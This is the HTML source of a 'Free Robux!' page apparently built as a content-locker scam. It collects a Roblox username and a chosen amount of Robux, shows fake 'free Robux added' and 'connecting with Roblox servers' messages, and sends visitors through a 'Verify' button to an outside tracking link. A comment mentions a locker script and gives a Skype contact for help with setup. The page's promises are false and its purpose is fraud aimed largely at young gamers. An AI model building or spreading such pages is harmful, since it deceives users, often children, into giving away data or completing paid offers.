<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="bootstrap.min.css">
    <link rel="stylesheet" href="devices.min.css">
    <link rel="stylesheet" href="main.css">
    <link rel="icon" type="image/x-icon" href="favicon.ico">
    <title>Free Robux!</title>
</head>

<body>
    <div class="device device-iphone-x">
        <div class="device-frame">
            <div class="device-content">
                <div class="FLICK">

                    <div class="FLICK2">

                        <div class="P1">

                            <img src="LOGO.png" class="w-75 img-fluid mx-auto">

                            <h2>Get <strong>Robux</strong> for free!</h2>

                            <hr>

                            <h5><strong>Step 1:</strong> Type in your <strong>Roblox</strong> username to continue.</h5>

                            <input type="text" class="form-control form-control-lg mb-2 pt-4 pb-4" id="robname" placeholder="Roblox username">

                            <h5><strong>Step 2:</strong> Select how many <strong>free Robux</strong> do you want.</h5>

                             <select class="form-control form-control-lg mx-auto mb-2" id="robux">
                                 <option value="">How many free Robux?</option>
                                 <option value="1700">1700 Robux</option>
                                 <option value="4500">4500 Robux</option>
                                 <option value="10000">10000 Robux</option>
                              </select>

                            <button type="button" class="S1B btn btn-lg btn-block btn-light mb-1 mt-1 pt-2 pb-2" onclick="S1();">Continue</button>

                        </div>

                        <div class="P2">

                            <img src="LOGO.png" class="w-75 img-fluid mx-auto">

                            <h5 id="step34"><strong>Step 3:</strong> Is this <strong>your Roblox profile</strong></h5>

                            <div class="SCARED">

                                <h3 class="mb-2 robnames"></h3>

                                <div class="row justify-content-center">

                                  <div class="col text-center" style="display: flex !important;"><img class="img-fluid robavatar w-75 mx-auto" style="align-self: center !important;"></div>
                                  <div class="col text-center"><img class="img-fluid robwearing"></div>

                                </div>

                                <h4 class="freerobux"><img class="IR" src="Robux.png"> <strong><span id="acc">0</span> free Robux</strong> added...</h4>

                            </div>

                            <h4 class="freerobux777"><img class="IR" src="Robux.png"> <strong><span id="acc777">0</span> free Robux</strong> added...</h4>

                            <div class="row justify-content-center mt-2 YESNO">

                                <div class="col pr-1">
                                    <button type="button" id="BTNYES" class="S2B1 btn btn-block btn-lg btn-light" onclick="SYES();">Yes</button>
                                </div>

                                <div class="col pl-1">
                                    <button type="button" id="BTNNO" class="S2B2 btn btn-block btn-lg btn-light" onclick="SNO();">No</button>
                                </div>

                            </div>

                            <button type="button" id="BTNADD" class="S2B3 btn btn-block btn-lg btn-light mt-2" onclick="SADD();"></button>

                            <h5 id="CONS" class="mt-2">Connecting with <strong>Roblox servers</strong>...</h5>

                            <button type="button" id="VER" class="S2B4 VB btn btn-block btn-lg btn-light mt-2" onclick="window.location.href='https://www.bigappboi.com/cl.php?id=04cecfa0541e2ff522a8e5f06da3ca90'"><strong>Verify</strong></button>

                        </div>

                    </div>

                    <img class="rob-bot" src="BOTTOM.jpg">

                </div>
            </div>
        </div>
        <div class="device-stripe"></div>
        <div class="device-header"></div>
        <div class="device-sensors"></div>
        <div class="device-btns"></div>
        <div class="device-power"></div>
    </div>

    <script src="jquery-3.4.1.min.js"></script>
    <script src="popper.min.js"></script>
    <script src="bootstrap.min.js"></script>
    <script src="countUp.js"></script>
    <script src="main.js"></script>

    <!-- LOCKER SCRIPT WITH LOAD METHOD: ONCLICK -->
    <!-- IF YOU NEED HELP SKYPE ME: flicks1337 -->

</body>

</html>
